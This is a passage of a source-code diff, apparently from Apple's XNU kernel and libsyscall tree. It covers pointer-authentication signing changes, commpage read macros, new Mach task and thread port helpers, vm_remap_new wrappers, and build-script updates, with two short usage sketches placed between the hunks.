+ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags)
 {
        ptrauth_generic_signature_t sig = 0;
 
@@ -58,22 +59,31 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int
                data ^= (uint64_t)ptr;
        }
 
-       /* First round adds salt */
+       /* First round adds ptrauth_utils_sign_blob_generic discrimination. */
+       sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-prologue") | 0x01);
+
+       /* Second round adds salt */
        sig = ptrauth_sign_generic_data(sig, data);
 
        /* Calculate an additive signature of the buffer */
        for (uint64_t i = 0; i < rounds; i++) {
-               sig = ptrauth_sign_generic_data(*(uintptr_t *)ptr, sig);
+               sig = ptrauth_sign_generic_data(*(const uintptr_t *)ptr, sig);
                ptr += sizeof(uintptr_t);
        }
 
        /* ptrauth_sign_generic_data operates on pointer-sized values only,
         * so we need to handle trailing bytes for the non-pointer-aligned case */
        if (ntrailing) {
-               memcpy(&trailing, ptr, ntrailing);
+               for (int i = 0; i < ntrailing; i++) {
+                       ((uint8_t *)&trailing)[i] = ((const uint8_t *)ptr)[i];
+               }
                sig = ptrauth_sign_generic_data(trailing, sig);
        }
 
+
+       /* Final round to add an additional cookie */
+       sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-epilogue") | 0x01);
+
        return sig;
 }
 
@@ -82,8 +92,9 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int
  *
  * Authenticate signature produced by ptrauth_utils_sign_blob_generic
  */
+__attribute__((noinline))
 void
-ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature)
+ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature)
 {
        ptrauth_generic_signature_t calculated_signature = 0;
 
index 308dc426a9fc1d5673eb730101c440acd51f7b4a..b20de6a3d7474e91efa4e02ecf046718342fc5ba 100644 (file)
@@ -68,7 +68,9 @@ KLD_FILES = $(OBJS)
 
 $(COMPONENT).filelist: $(OBJS)
        $(_v)for kld_file in ${KLD_FILES}; do      \
-               $(SEG_HACK) -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \
+               $(SEG_HACK) -s __TEXT -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \
+               mv $${kld_file}__ $${kld_file} || exit 1; \
+               $(SEG_HACK) -i __KLD -n __KLDDATA -o $${kld_file}__ $${kld_file} || exit 1; \
                mv $${kld_file}__ $${kld_file} || exit 1; \
        done
        @$(LOG_LDFILELIST) "$(COMPONENT)"
index 15531c0fe38462d428b2972f8fd1d237767fffb9..6255b46ca4599297e68a3da6ec08e6d500385feb 100644 (file)
@@ -63,11 +63,6 @@ CLANG_WARN_SUSPICIOUS_MOVE = YES
 CODE_SIGN_IDENTITY = -
 DYLIB_CURRENT_VERSION = $(RC_ProjectSourceVersion)
 DYLIB_LDFLAGS = -umbrella System -all_load
-DYLIB_LDFLAGS[sdk=iphoneos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=watchos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=tvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=appletvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
-DYLIB_LDFLAGS[sdk=bridgeos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000
 OTHER_LDFLAGS = $(SIMULATOR_LDFLAGS)
 SIMULATOR_LDFLAGS =
 SIMULATOR_LDFLAGS[sdk=macosx*] = -Wl,-simulator_support
index 05e98094877ccbeedb0031785765cde5e0ac5697..74584782f67410d20f2bd14b61430d2f65332baa 100644 (file)
                24B8C2621237F53900D36CC3 /* remove-counter.c in Sources */ = {isa = PBXBuildFile; fileRef = 24B8C2611237F53900D36CC3 /* remove-counter.c */; };
                24D1158311E671B20063D54D /* SYS.h in Headers */ = {isa = PBXBuildFile; fileRef = 24D1157411E671B20063D54D /* SYS.h */; };
                24E4782712088267009A384D /* _libc_funcptr.c in Sources */ = {isa = PBXBuildFile; fileRef = 24E47824120881DF009A384D /* _libc_funcptr.c */; };
+               2561E8AA25082E6300EAA925 /* task.c in Sources */ = {isa = PBXBuildFile; fileRef = 2561E8A925082E6300EAA925 /* task.c */; };
                291D3C281354FDD100D46061 /* mach_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C261354FDD100D46061 /* mach_port.c */; };
                291D3C291354FDD100D46061 /* mach_vm.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C271354FDD100D46061 /* mach_vm.c */; };
                29A59AE2183B0DE000E8B896 /* renameat.c in Sources */ = {isa = PBXBuildFile; fileRef = 29A59AE1183B0DE000E8B896 /* renameat.c */; };
                24D1159811E672270063D54D /* syscall.map */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = syscall.map; sourceTree = "<group>"; };
                24D1159911E6723E0063D54D /* create-syscalls.pl */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.script.perl; path = "create-syscalls.pl"; sourceTree = "<group>"; };
                24E47824120881DF009A384D /* _libc_funcptr.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = _libc_funcptr.c; sourceTree = "<group>"; };
+               2561E8A925082E6300EAA925 /* task.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = task.c; sourceTree = "<group>"; };
                291D3C261354FDD100D46061 /* mach_port.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_port.c; sourceTree = "<group>"; };
                291D3C271354FDD100D46061 /* mach_vm.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_vm.c; sourceTree = "<group>"; };
                29A59AE1183B0DE000E8B896 /* renameat.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = renameat.c; sourceTree = "<group>"; };
                                C9D9BCCC114B00600000D8B9 /* err_libkern.sub */,
                                C9D9BCCD114B00600000D8B9 /* err_mach_ipc.sub */,
                                C9D9BCCE114B00600000D8B9 /* err_server.sub */,
+                               2561E8A925082E6300EAA925 /* task.c */,
                                C9D9BCCF114B00600000D8B9 /* err_us.sub */,
                                C9D9BCD0114B00600000D8B9 /* error_codes.c */,
                                C9D9BCD1114B00600000D8B9 /* errorlib.h */,
                                24A7C5C111FF8DA6007669EB /* getsockname.c in Sources */,
                                925559921CBC23C300E527CE /* mach_boottime.c in Sources */,
                                24A7C5C211FF8DA6007669EB /* lchown.c in Sources */,
+                               2561E8AA25082E6300EAA925 /* task.c in Sources */,
                                24A7C5C311FF8DA6007669EB /* listen.c in Sources */,
                                24A7C5C411FF8DA6007669EB /* recvfrom.c in Sources */,
                                13CBF78224575F9F00B26F7D /* open-base.c in Sources */,
diff --git a/libsyscall/mach/.gitignore b/libsyscall/mach/.gitignore
deleted file mode 100644 (file)
index f718d68..0000000
+++ /dev/null
@@ -1,3 +0,0 @@
-*.pbxuser
-*.perspectivev3
-build/
index 6a7ec639e935069ae6da5dd549eac6d3d678a1f1..6d977fd59cfbb0cabd35f4453585999795f02cee 100644 (file)
@@ -37,8 +37,7 @@ kern_return_t
 host_get_atm_diagnostic_flag(host_t host __unused,
     uint32_t *diagnostic_flag)
 {
-       volatile uint32_t *diagnostic_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_ATM_DIAGNOSTIC_CONFIG);
-       *diagnostic_flag = *diagnostic_flag_address;
+       *diagnostic_flag = COMM_PAGE_READ(uint32_t, ATM_DIAGNOSTIC_CONFIG);
        return KERN_SUCCESS;
 }
 
@@ -47,8 +46,7 @@ host_get_multiuser_config_flags(host_t host __unused,
     uint32_t *multiuser_flags)
 {
 #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG);
-       *multiuser_flags = *multiuser_flag_address;
+       *multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG);
        return KERN_SUCCESS;
 #else
        (void)multiuser_flags;
index 4d9d51f466e859a962e95f7072750b31d7625d68..e223fc8e2e8224eb9a5da0b01805759a67aeb45d 100644 (file)
 
 #include <sys/cdefs.h>
 
+#ifndef KERNEL
+#include <Availability.h>
+#endif
+
 /*
  *     Kernel-related ports; how a task/thread controls itself
  */
@@ -71,6 +75,8 @@
 __BEGIN_DECLS
 extern mach_port_t mach_host_self(void);
 extern mach_port_t mach_thread_self(void);
+__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3))
+extern boolean_t mach_task_is_self(task_name_t task);
 extern kern_return_t host_page_size(host_t, vm_size_t *);
 
 extern mach_port_t      mach_task_self_;
index e237e2757e8f768a7165eebb9f10e9ac5303dfc4..f96418b4b91094cc1b2d63951133ec5b5759e5e9 100644 (file)
@@ -44,6 +44,12 @@ const char *mach_host_special_port_description(int offset);
  */
 const char *mach_task_special_port_description(int offset);
 
+/*
+ * Returns a string describing the thread special port offset provided, or NULL if
+ * the provided offset is not a thread special port offset.
+ */
+const char *mach_thread_special_port_description(int offset);
+
 /*
  * Returns the port for the given identifier of a host special port.  For
  * instance, passing "HOST_PRIV_PORT" would return 1.
@@ -59,6 +65,13 @@ int mach_host_special_port_for_id(const char *id);
  */
 int mach_task_special_port_for_id(const char *id);
 
+/*
+ * Returns the port for the given identifier of a thread special port.
+ *
+ * Returns -1 on error.
+ */
+int mach_thread_special_port_for_id(const char *id);
+
 __END_DECLS
 
 #endif /* !defined(_MACH_PORT_DESCRIPTIONS_) */
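A sketch of how the new thread variants mirror the existing host/task helpers
(the identifier string is assumed to be the macro name, as with the other
*_for_id routines):

#include <mach/port_descriptions.h>
#include <stdio.h>

static void
dump_thread_read_port(void)
{
	int offset = mach_thread_special_port_for_id("THREAD_READ_PORT");

	if (offset >= 0) {
		printf("THREAD_READ_PORT = %d (%s)\n", offset,
		    mach_thread_special_port_description(offset));
	}
}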
index 4206401a8d06e72c9453c104d63858a74628c04d..6a976709bfdebb83749414f60878f1f59fa4aef7 100644 (file)
@@ -137,13 +137,13 @@ mach_init_doit(void)
 
        if (vm_kernel_page_shift == 0) {
 #if defined(__x86_64__) || defined(__i386__)
-               if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) {
-                       vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT;
+               if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) {
+                       vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT);
                } else {
                        vm_kernel_page_shift = I386_PGSHIFT;
                }
 #else
-               vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT;
+               vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT);
 #endif
                vm_kernel_page_size = 1 << vm_kernel_page_shift;
                vm_kernel_page_mask = vm_kernel_page_size - 1;
@@ -151,12 +151,12 @@ mach_init_doit(void)
 
        if (vm_page_shift == 0) {
 #if defined(__arm64__)
-               vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64;
+               vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64);
 #elif defined(__arm__)
-               vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_32;
+               vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_32);
 #else
-               if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) {
-                       vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64;
+               if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) {
+                       vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64);
                } else {
                        vm_page_shift = vm_kernel_page_shift;
                }
index 6a305be025887feb46690e91038bc02bd33300c4..d9f5649887e13fd0b31a47fbcb1db76fb2ebbba5 100644 (file)
@@ -439,7 +439,7 @@ mach_port_space_basic_info(
 }
 
 static inline mach_port_t
-_tsd_get_special_reply_port()
+_tsd_get_special_reply_port(void)
 {
        return (mach_port_t)(uintptr_t)_os_tsd_get_direct(__TSD_MACH_SPECIAL_REPLY);
 }
index 8b8dfa3fa4374fc78184baafb6af7ec2602a4c5c..365d9a94bc5af08661ea8b0108dd8f356abec4f0 100644 (file)
@@ -222,6 +222,36 @@ mach_vm_remap(
        return rv;
 }
 
+kern_return_t
+mach_vm_remap_new(
+       mach_port_name_t target,
+       mach_vm_address_t *address,
+       mach_vm_size_t size,
+       mach_vm_offset_t mask,
+       int flags,
+       mach_port_name_t src_task,
+       mach_vm_address_t src_address,
+       boolean_t copy,
+       vm_prot_t *cur_protection,
+       vm_prot_t *max_protection,
+       vm_inherit_t inheritance)
+{
+       kern_return_t rv;
+
+       /* {max,cur}_protection is inout */
+       rv = _kernelrpc_mach_vm_remap_new(target, address, size, mask, flags,
+           src_task, src_address, copy, cur_protection, max_protection,
+           inheritance);
+
+       if (__syscall_logger && rv == KERN_SUCCESS) {
+               int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem;
+               int userTagFlags = flags & VM_FLAGS_ALIAS_MASK;
+               __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0);
+       }
+
+       return rv;
+}
+
 kern_return_t
 mach_vm_read(
        mach_port_name_t target,
@@ -301,6 +331,36 @@ vm_remap(
        return rv;
 }
 
+kern_return_t
+vm_remap_new(
+       mach_port_name_t target,
+       vm_address_t *address,
+       vm_size_t size,
+       vm_offset_t mask,
+       int flags,
+       mach_port_name_t src_task,
+       vm_address_t src_address,
+       boolean_t copy,
+       vm_prot_t *cur_protection,
+       vm_prot_t *max_protection,
+       vm_inherit_t inheritance)
+{
+       kern_return_t rv;
+
+       /* {max,cur}_protection is inout */
+       rv = _kernelrpc_vm_remap_new(target, address, size, mask, flags,
+           src_task, src_address, copy, cur_protection, max_protection,
+           inheritance);
+
+       if (__syscall_logger) {
+               int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem;
+               int userTagFlags = flags & VM_FLAGS_ALIAS_MASK;
+               __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0);
+       }
+
+       return rv;
+}
+
 kern_return_t
 vm_read(
        mach_port_name_t target,
index 2e086c80d061ccf1a7943b9e67e02238ba244bc7..acf8c8390bf088b8535bf467f68a269f5ca257c3 100644 (file)
@@ -29,6 +29,7 @@
 #include <errno.h>
 #include <mach/host_special_ports.h>
 #include <mach/task_special_ports.h>
+#include <mach/thread_special_ports.h>
 #include <mach/port_descriptions.h>
 #include <stdlib.h>
 #include <strings.h>
@@ -71,8 +72,9 @@ mach_host_special_port_description(int port)
                [HOST_SYSPOLICYD_PORT] = "syspolicyd",
                [HOST_FILECOORDINATIOND_PORT] = "filecoordinationd",
                [HOST_FAIRPLAYD_PORT] = "fairplayd",
+               [HOST_IOCOMPRESSIONSTATS_PORT] = "I/O compression stats",
        };
-       _Static_assert(HOST_FAIRPLAYD_PORT == HOST_MAX_SPECIAL_PORT,
+       _Static_assert(HOST_IOCOMPRESSIONSTATS_PORT == HOST_MAX_SPECIAL_PORT,
            "all host special ports must have descriptions");
 
        return hsp_descs[port_index];
@@ -92,6 +94,8 @@ mach_task_special_port_description(int port)
                [TASK_HOST_PORT] = "host",
                [TASK_NAME_PORT] = "name",
                [TASK_BOOTSTRAP_PORT] = "bootstrap",
+               [TASK_INSPECT_PORT] = "inspect",
+               [TASK_READ_PORT] = "read",
                [TASK_SEATBELT_PORT] = "seatbelt",
                [TASK_ACCESS_PORT] = "access",
                [TASK_DEBUG_CONTROL_PORT] = "debug control",
@@ -103,6 +107,26 @@ mach_task_special_port_description(int port)
        return tsp_descs[port_index];
 }
 
+const char *
+mach_thread_special_port_description(int port)
+{
+       int port_index = (int)port;
+
+       if (port_index < 0 || port_index > THREAD_MAX_SPECIAL_PORT) {
+               return NULL;
+       }
+
+       static const char *tsp_descs[] = {
+               [THREAD_KERNEL_PORT] = "kernel",
+               [THREAD_INSPECT_PORT] = "inspect",
+               [THREAD_READ_PORT] = "read",
+       };
+       _Static_assert(THREAD_READ_PORT == THREAD_MAX_SPECIAL_PORT,
+           "all thread special ports must have descriptions");
+
+       return tsp_descs[port_index];
+}
+
 static int
 port_for_id_internal(const char *id, const char **ids, int nids)
 {
@@ -166,10 +190,25 @@ mach_task_special_port_for_id(const char *id)
                SP_ENTRY(TASK_HOST_PORT),
                SP_ENTRY(TASK_NAME_PORT),
                SP_ENTRY(TASK_BOOTSTRAP_PORT),
+               SP_ENTRY(TASK_INSPECT_PORT),
+               SP_ENTRY(TASK_READ_PORT),
                SP_ENTRY(TASK_SEATBELT_PORT),
                SP_ENTRY(TASK_ACCESS_PORT),
                SP_ENTRY(TASK_DEBUG_CONTROL_PORT),
                SP_ENTRY(TASK_RESOURCE_NOTIFY_PORT),
+       };
+
+       return port_for_id_internal(id, tsp_ids,
+                  sizeof(tsp_ids) / sizeof(tsp_ids[0]));
+}
+
+int
+mach_thread_special_port_for_id(const char *id)
+{
+       static const char *tsp_ids[] = {
+               SP_ENTRY(THREAD_KERNEL_PORT),
+               SP_ENTRY(THREAD_INSPECT_PORT),
+               SP_ENTRY(THREAD_READ_PORT),
 #undef SP_ENTRY
        };
 
diff --git a/libsyscall/mach/task.c b/libsyscall/mach/task.c
new file mode 100644 (file)
index 0000000..b93a0a2
--- /dev/null
@@ -0,0 +1,47 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#undef _task_user_
+#include <mach/task_internal.h>
+
+extern mach_port_t      mach_task_self_;
+
+boolean_t
+mach_task_is_self(task_name_t task)
+{
+       boolean_t is_self;
+       kern_return_t kr;
+
+       if (task == mach_task_self_) {
+               return TRUE;
+       }
+
+       kr = _kernelrpc_mach_task_is_self(task, &is_self);
+
+       return kr == KERN_SUCCESS && is_self;
+}
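A hypothetical caller of the new routine (sketch only): a service that honors
requests only when the supplied port names the current task.

#include <mach/mach.h>

kern_return_t
handle_request(task_name_t requestor)
{
	if (!mach_task_is_self(requestor)) {
		return KERN_NO_ACCESS;
	}
	/* ... operate on behalf of the current task ... */
	return KERN_SUCCESS;
}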
index a763dfae471641dced6385c5e2d167ab28e0e5f3..ccd2b33e34ca52be82b4ced60da93f6db15feda6 100644 (file)
@@ -55,9 +55,8 @@ __commpage_gettimeofday_internal(struct timeval *tp, uint64_t *tbr_out)
        volatile uint64_t *gtod_Ticks_scale_p;
        volatile uint64_t *gtod_Ticks_per_sec_p;
 
-       new_commpage_timeofday_data_t *commpage_timeofday_datap;
-
-       commpage_timeofday_datap =  (new_commpage_timeofday_data_t *)_COMM_PAGE_NEWTIMEOFDAY_DATA;
+       COMM_PAGE_SLOT_TYPE(new_commpage_timeofday_data_t) commpage_timeofday_datap =
+           COMM_PAGE_SLOT(new_commpage_timeofday_data_t, NEWTIMEOFDAY_DATA);
 
        gtod_TimeStamp_tick_p = &commpage_timeofday_datap->TimeStamp_tick;
        gtod_TimeStamp_sec_p = &commpage_timeofday_datap->TimeStamp_sec;
index 6440b6098f6cd4cdf70795726ed3d7ff0ebf8388..d1eac6f21eb14a56f5a14a25215ba585e1a0775a 100644 (file)
@@ -30,6 +30,7 @@
 #include <stdbool.h>
 #include <strings.h>
 #include <unistd.h>
+#include <mach/vm_page_size.h>
 #include "_libkernel_init.h"
 
 extern int mach_init(void);
@@ -81,6 +82,19 @@ __libkernel_init(_libkernel_functions_t fns,
                _dlsym = fns->dlsym;
        }
        mach_init();
+#if TARGET_OS_OSX
+       for (size_t i = 0; envp[i]; i++) {
+
+#if defined(__i386__) || defined(__x86_64__)
+               const char *VM_KERNEL_PAGE_SHIFT_ENV = "VM_KERNEL_PAGE_SIZE_4K=1";
+               if (vm_kernel_page_shift != 12 && strcmp(VM_KERNEL_PAGE_SHIFT_ENV, envp[i]) == 0) {
+                       vm_kernel_page_shift = 12;
+                       vm_kernel_page_size = 1 << vm_kernel_page_shift;
+                       vm_kernel_page_mask = vm_kernel_page_size - 1;
+               }
+#endif /* defined(__i386__) || defined(__x86_64__) */
+       }
+#endif /* TARGET_OS_OSX */
 }
 
 void
index e09f849cce42cc9eb38abb4201a1860fc8ac7795..01d462b4954b65187109575dd62dd237f0930ac6 100644 (file)
@@ -33,12 +33,7 @@ getiopolicy_np(int iotype, int scope)
        int policy, error;
        struct _iopol_param_t iop_param;
 
-       if ((iotype != IOPOL_TYPE_DISK && iotype != IOPOL_TYPE_VFS_ATIME_UPDATES && iotype != IOPOL_TYPE_VFS_MATERIALIZE_DATALESS_FILES) ||
-           (scope != IOPOL_SCOPE_PROCESS && scope != IOPOL_SCOPE_THREAD)) {
-               errno = EINVAL;
-               policy = -1;
-               goto exit;
-       }
+       /* Do not sanity check iotype and scope, leave it to kernel. */
 
        iop_param.iop_scope = scope;
        iop_param.iop_iotype = iotype;
index d7409d5419169383e98735e9deed9074f1c0b5ce..af00595629b7ff08cd4e27cf0ab2189c361bd02c 100644 (file)
@@ -84,7 +84,7 @@ kdebug_typefilter(void)
 bool
 kdebug_is_enabled(uint32_t debugid)
 {
-       uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE));
+       uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE);
 
        if (state == 0) {
                return FALSE;
@@ -119,7 +119,7 @@ kdebug_is_enabled(uint32_t debugid)
 bool
 kdebug_using_continuous_time(void)
 {
-       uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE));
+       uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE);
        return state & KDEBUG_ENABLE_CONT_TIME;
 }
 
index cb199cf070182dd288f17ebb2d87347a4ce198a3..50fc667b9f20fa466e171d9812462c855b58b979 100644 (file)
@@ -30,9 +30,8 @@ extern uint64_t mach_absolute_time(void);
 uint64_t
 mach_approximate_time(void)
 {
-       uint8_t supported = *((uint8_t *)_COMM_PAGE_APPROX_TIME_SUPPORTED);
-       if (supported) {
-               return *((uint64_t *)_COMM_PAGE_APPROX_TIME);
+       if (COMM_PAGE_READ(uint8_t, APPROX_TIME_SUPPORTED)) {
+               return COMM_PAGE_READ(uint64_t, APPROX_TIME);
        }
        return mach_absolute_time();
 }
index 5028f3a65b459570443d0331490f1adc78ab552d..4a262e5e3bb05006c7981dac1bbc7d8e7786f2a1 100644 (file)
@@ -25,5 +25,5 @@
 uint64_t
 mach_boottime_usec(void)
 {
-       return *(uint64_t*)_COMM_PAGE_BOOTTIME_USEC;
+       return COMM_PAGE_READ(uint64_t, BOOTTIME_USEC);
 }
index e9084603442edeb94ada4f0853e5f6e24d518625..1158c2431eee3639ab7bcfa185ce1e7392266c57 100644 (file)
@@ -50,7 +50,8 @@ mach_bridge_remote_time(__unused uint64_t local_time)
        uint64_t now = 0;
        struct bt_params params = {};
 
-       volatile struct bt_params *commpage_bt_params_p = (struct bt_params *)_COMM_PAGE_REMOTETIME_PARAMS;
+       COMM_PAGE_SLOT_TYPE(struct bt_params) commpage_bt_params_p =
+           COMM_PAGE_SLOT(struct bt_params, REMOTETIME_PARAMS);
        volatile uint64_t *base_local_ts_p = &commpage_bt_params_p->base_local_ts;
        volatile uint64_t *base_remote_ts_p = &commpage_bt_params_p->base_remote_ts;
        volatile double *rate_p = &commpage_bt_params_p->rate;
index f51db78e454a0e7ccc1d26aad35577a73c78a589..ba650e974f1dd5110009f28e9aaaf5903ba8cd33 100755 (executable)
@@ -33,7 +33,9 @@ cd $OBJROOT
 MIG=`xcrun -sdk "$SDKROOT" -find mig`
 MIGCC=`xcrun -sdk "$SDKROOT" -find cc`
 export MIGCC
-MIG_DEFINES="-DLIBSYSCALL_INTERFACE"
+[ -n "$DRIVERKITROOT" ] && MIG_DRIVERKIT_DEFINES="-DDRIVERKIT"
+MIG_DEFINES="-DLIBSYSCALL_INTERFACE $MIG_DRIVERKIT_DEFINES"
+MIG_PRIVATE_DEFINES="-DPRIVATE -D_OPEN_SOURCE_ -D__OPEN_SOURCE__"
 MIG_HEADER_OBJ="$OBJROOT/mig_hdr/include/mach"
 MIG_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach"
 MIG_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach"
@@ -41,8 +43,7 @@ SERVER_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/servers"
 MACH_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach"
 MACH_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach"
 MIG_INTERNAL_HEADER_DST="$BUILT_PRODUCTS_DIR/internal_hdr/include/mach"
-MIG_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/include -I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/local/include"
-MIG_PRIVATE_DEFS_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/System/Library/Frameworks/System.framework/PrivateHeaders"
+MIG_INCFLAGS="-I${SRCROOT}/../osfmk"
 SRC="$SRCROOT/mach"
 FILTER_MIG="$SRCROOT/xcodescripts/filter_mig.awk"
 
@@ -96,6 +97,7 @@ fi
 
 MIGS_INTERNAL="mach_port.defs
        mach_vm.defs
+       task.defs
        thread_act.defs
        vm_map.defs"
 
@@ -161,7 +163,7 @@ mkdir -p $MIG_PRIVATE_HEADER_DST
 
 for mig in $MIGS_PRIVATE $MIGS_DUAL_PUBLIC_PRIVATE; do
        MIG_NAME=`basename $mig .defs`
-       $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_INCFLAGS $MIG_PRIVATE_DEFS_INCFLAGS $SRC/$mig
+       $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_PRIVATE_DEFINES $MIG_INCFLAGS $SRC/$mig
        if [ ! -e "$MIG_HEADER_DST/$MIG_NAME.h" ]; then
                echo "#error $MIG_NAME.h unsupported." > "$MIG_HEADER_DST/$MIG_NAME.h"
        fi
@@ -178,4 +180,4 @@ for mig in $MIGS_INTERNAL; do
        MIG_NAME=`basename $mig .defs`
        $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_INTERNAL_HEADER_DST/${MIG_NAME}_internal.h" $MIG_INCFLAGS $SRC/$mig
 done
\ No newline at end of file
index 63dd0de0346b8aee8d490586f8b0f0e295cf3afd..32ac9d6d58745c7cfb195ed92b3461db024aaf78 100644 (file)
@@ -209,6 +209,9 @@ endif
 ifeq ($(NMEDIT),)
        export NMEDIT := $(shell $(XCRUN) -sdk $(SDKROOT) -find nmedit)
 endif
+ifeq ($(SCAN_BUILD),)
+       export SCAN_BUILD := $(shell $(XCRUN) -sdk $(SDKROOT) -find scan-build)
+endif
 
 #
 # Platform options
@@ -258,6 +261,7 @@ SLEEP = /bin/sleep
 AWK = /usr/bin/awk
 SED = /usr/bin/sed
 PLUTIL = /usr/bin/plutil
+GREP = /usr/bin/grep
 
 #
 # Command to generate host binaries. Intentionally not
index 5c5ef1a9263da31d04609489b476b938e100181f..b2e90a4a3367bc616b92bf9c2e55d65530220f38 100644 (file)
@@ -59,18 +59,18 @@ COMPONENT_LIST      = osfmk bsd libkern iokit pexpert libsa security san
 COMPONENT      = $(if $(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(firstword $(subst /, ,$(RELATIVE_SOURCE_PATH))))
